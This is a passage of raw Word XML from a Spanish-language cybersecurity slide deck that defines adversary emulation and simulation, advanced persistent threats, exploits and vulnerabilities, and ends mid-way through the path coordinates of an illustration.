          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="280" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A79971" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1404"/>
        </w:tabs>
        <w:spacing w:before="103" w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1404" w:right="1108" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La emulación </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>de adversarios es la imitación de alguien o algo más. En función de la inteligencia sobre amenazas, determine que es más probable que el grupo FIN10 se dirija a una organización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB666BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138FF651" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="467"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E947F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1404"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1404" w:right="1832" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo: Para emular a este adversario, imita los TTP que utilizan y los prueba en su entorno. Te comportas exactamente como lo harían ellos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547972BD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5233B179" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="404"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242C4F9E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1403"/>
        </w:tabs>
        <w:spacing w:line="650" w:lineRule="exact"/>
        <w:ind w:left="1403" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Simulación de adversarios</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, quieres que parezca que está ocurriendo un ataque real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F72003" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1404"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>mientras que no hay un adversario real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93F518" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602E8A09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="398"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74725FE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1403"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1403" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Usted hace uso de TTPs que funcionan en el entorno en cuestión, independientemente de qué APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5D238" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1404"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>realmente los usa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE9C44" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="880" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEDA216" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1319"/>
          <w:tab w:val="left" w:pos="1321"/>
        </w:tabs>
        <w:spacing w:before="118" w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1321" w:right="1263"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Amenaza persistente avanzada [APT] </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Una amenaza persistente avanzada es un actor de amenazas sigiloso, generalmente un estado nación o un grupo patrocinado por un estado, que obtiene acceso no autorizado a una red informática y permanece sin ser detectado durante un período prolongado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70077A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DB92DC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="453"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409DDCF6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1321"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1321" w:right="2840"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Es el código real a través del cual puede el atacante aprovecharse de una laguna en particular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03329772" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E8AE3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6770E1A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1321"/>
        </w:tabs>
        <w:ind w:left="1321" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Vulnerabilidad</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DBACD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2040"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2040" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La laguna existente en un software o hardware en particular puede llamarse vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08444356" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2040"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2040" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>También puede entenderse como el eslabón más débil que permite a un atacante comprometer el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7ED45" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="760" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB63E4B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="642" w:lineRule="exact"/>
        <w:ind w:left="1950" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ejemplo:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D808F00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="178"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487600128" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12E20AA7" wp14:editId="04BF75C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1545818</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1702041</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="895350" cy="106934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069340"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="895350" h="1069340">
                              <a:moveTo>
                                <a:pt x="671271" y="223621"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="666724" y="178549"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="653694" y="136575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="633056" y="98590"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="605739" y="65493"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="572617" y="38188"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="534619" y="17564"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492607" y="4533"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="447522" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="402424" y="4533"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="360426" y="17564"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="322414" y="38188"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="289293" y="65493"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261975" y="98590"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="241338" y="136575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="228307" y="178549"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="223761" y="223621"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="228307" y="268681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="241338" y="310667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="261975" y="348653"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="289293" y="381749"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="322414" y="409054"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="360426" y="429666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="402424" y="442696"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="447522" y="447243"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492607" y="442696"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="534619" y="429666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="572617" y="409054"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="605739" y="381749"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="633056" y="348653"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="653694" y="310667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="666724" y="268681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="671271" y="223621"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="895350" h="1069340">
                              <a:moveTo>
                                <a:pt x="855738" y="1015669"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="749173" y="1015669"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="749173" y="928458"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="749173" y="918667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="749173" y="761860"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="749173" y="759472"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="749173" y="667372"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="746379" y="653554"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="738771" y="642277"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="727481" y="634657"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="713651" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617575" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617575" y="840257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="539115" y="918667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="519404" y="898969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="578002" y="840257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="519404" y="781558"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="539115" y="761860"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617575" y="840257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617575" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492683" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492683" y="770242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="427240" y="928458"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="403720" y="918667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="401370" y="917689"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="465975" y="761860"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="466953" y="759472"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492683" y="770242"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492683" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="375081" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="375081" y="781558"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="316484" y="840257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="375081" y="898969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="355358" y="918667"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="276898" y="840257"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="355358" y="761860"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="375081" y="781558"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="375081" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="181800" y="631875"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="167982" y="634657"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="156692" y="642277"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="149072" y="653554"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="146278" y="667372"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="146278" y="1015669"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="39293" y="1015669"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="39293" y="1033424"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="42125" y="1047216"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="49745" y="1058481"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="61023" y="1066088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="74815" y="1068920"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="820216" y="1068920"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="834021" y="1066088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="845286" y="1058481"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="852906" y="1047216"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="855738" y="1033424"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="855738" y="1015669"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="895350" h="1069340">
                              <a:moveTo>
                                <a:pt x="895032" y="862622"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="853084" y="613702"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="839736" y="572503"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="812520" y="538784"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="766432" y="510311"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="717981" y="486308"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="667512" y="466915"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="590588" y="447382"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="545414" y="470522"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="497522" y="484403"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="448284" y="489038"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="399046" y="484403"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="351167" y="470522"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="305993" y="447382"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="280822" y="451993"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="228561" y="467194"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="177901" y="486803"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="129133" y="510717"/>
                              </a:lnTo>
